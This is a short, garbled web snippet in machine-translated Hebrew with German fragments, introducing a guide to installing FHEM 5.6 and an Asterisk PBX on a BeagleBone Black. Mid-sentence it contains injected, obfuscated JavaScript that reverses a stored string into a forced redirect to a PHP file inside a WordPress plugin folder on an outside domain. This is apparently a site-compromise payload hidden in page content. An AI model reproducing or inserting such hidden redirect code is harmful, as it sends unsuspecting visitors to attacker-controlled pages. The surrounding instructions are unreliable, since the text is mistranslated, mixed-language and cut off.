להתקין V5.6 FHEM על BEAGLEBONE השחור יחד עם מערכת טלפון PBX אסטריסק! החלפת Fritzbox.

מערכת הטלפונים, אנחנו כבר התקנו אותה גם הגיונית FHEM 2. שלב ההתקנה. אם ברצונך להתקין רק FEHM, der befolgt unsere $p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math...
יותר